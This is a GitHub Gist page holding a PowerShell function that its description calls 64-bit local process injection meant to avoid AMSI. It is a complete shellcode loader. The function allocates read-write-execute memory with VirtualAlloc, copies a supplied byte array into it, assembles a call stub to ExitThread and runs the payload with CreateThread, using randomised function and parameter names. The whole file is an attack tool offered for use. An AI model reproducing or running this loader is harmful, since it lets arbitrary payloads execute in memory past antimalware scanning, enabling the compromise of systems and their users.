Last active
December 11, 2023 11:15
-
-
Save lockness-Ko/6faaccdfe645b4b0b219ecc44f19aa1f to your computer and use it in GitHub Desktop.
powershell 64-bit local process injection without having to bypass amsi. credits to mattifestation for initial implementation.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function t783grubyire79ui34ewui | |
{ | |
Param( | |
[Byte[]]$y2wuirg9348wpor239weoui | |
) | |
Add-Type -TypeDefinition @" | |
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
public static class Win32 | |
{ | |
[DllImport("kernel32.dll", CharSet = CharSet.Auto)] | |
public static extern IntPtr GetModuleHandle( | |
string lpModuleName | |
); | |
[DllImport("kernel32.dll", SetLastError = true)] | |
public static extern uint WaitForSingleObject( | |
IntPtr hHandle, | |
UInt32 dwMilliseconds); | |
[DllImport("kernel32.dll")] | |
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect); | |
[DllImport("kernel32.dll")] | |
public static extern IntPtr GetProcAddress(IntPtr hModule, String procName); | |
[DllImport("kernel32.dll")] | |
public static extern Boolean VirtualFree(IntPtr lpAddress, Int32 dwSize, UInt32 dwFreeType); | |
[DllImport("kernel32.dll")] | |
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, IntPtr dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, UInt32 dwCreationFlags, out IntPtr lpThreadId); | |
} | |
"@ | |
Set-StrictMode -Version 2.0 | |
function Local:Emit-CallThreadStub ([IntPtr] $BaseAddr, [IntPtr] $ExitThreadAddr, [Int] $Architecture) | |
{ | |
$IntSizePtr = $Architecture / 8 | |
function Local:ConvertTo-LittleEndian ([IntPtr] $Address) | |
{ | |
$LittleEndianByteArray = New-Object Byte[](0) | |
$Address.ToString("X$($IntSizePtr*2)") -split '([A-F0-9]{2})' | ForEach-Object { if ($_) { $LittleEndianByteArray += [Byte] ('0x{0}' -f $_) } } | |
[System.Array]::Reverse($LittleEndianByteArray) | |
Write-Output $LittleEndianByteArray | |
} | |
$CallStub = New-Object Byte[](0) | |
[Byte[]] $CallStub = 0x48,0xB8 | |
$CallStub += ConvertTo-LittleEndian $BaseAddr | |
$CallStub += 0xFF,0xD0,0x6A,0x00,0x48,0xB8 | |
$CallStub += ConvertTo-LittleEndian $ExitThreadAddr | |
$CallStub += 0xFF,0xD0 | |
Write-Output $CallStub | |
} | |
$BaseAddress = [Win32]::VirtualAlloc([IntPtr]::Zero, $y2wuirg9348wpor239weoui.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX) | |
[System.Runtime.InteropServices.Marshal]::Copy($y2wuirg9348wpor239weoui, 0, $BaseAddress, $y2wuirg9348wpor239weoui.Length) | |
$ExitThreadAddr = [Win32]::GetProcAddress([Win32]::GetModuleHandle("kernel32.dll"), "ExitThread") | |
$CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 64 | |
$CallStubAddress = [Win32]::VirtualAlloc([IntPtr]::Zero, $CallStub.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX) | |
[System.Runtime.InteropServices.Marshal]::Copy($CallStub, 0, $CallStubAddress, $CallStub.Length) | |
$ThreadHandle = [Win32]::CreateThread([IntPtr]::Zero, 0, $CallStubAddress, $BaseAddress, 0, [Ref] [IntPtr]::Zero) | |
[Win32]::WaitForSingleObject($ThreadHandle, 5000) | Out-Null | |
[Win32]::VirtualFree($CallStubAddress, $CallStub.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000) | |
[Win32]::VirtualFree($BaseAddress, $y2wuirg9348wpor239weoui.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000) | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment